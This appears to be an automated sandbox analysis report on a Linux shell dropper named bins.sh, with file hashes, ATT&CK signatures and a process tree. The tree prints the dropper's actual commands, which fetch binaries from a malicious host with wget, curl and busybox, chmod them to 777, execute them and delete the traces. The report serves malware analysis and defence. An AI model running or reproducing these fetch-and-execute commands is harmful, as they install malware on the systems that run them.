Analysis
-
max time kernel
598s -
max time network
313s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
16/12/2024, 04:16
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
7c06e835a83b81914ba9a19c15e66d76
-
SHA1
bc618204890c0b179a00d6d253001a6e27197aa1
-
SHA256
cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb
-
SHA512
4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2
-
SSDEEP
192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 812 chmod -
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 645 wget 655 curl 811 busybox 815 wget 816 curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:641
-
/bin/rm/bin/rm bins.sh2⤵PID:643
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:645
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:655
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- System Network Configuration Discovery
PID:811
-
-
/bin/chmodchmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:813
-
-
/bin/rmrm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- System Network Configuration Discovery
PID:815
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
PID:816
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1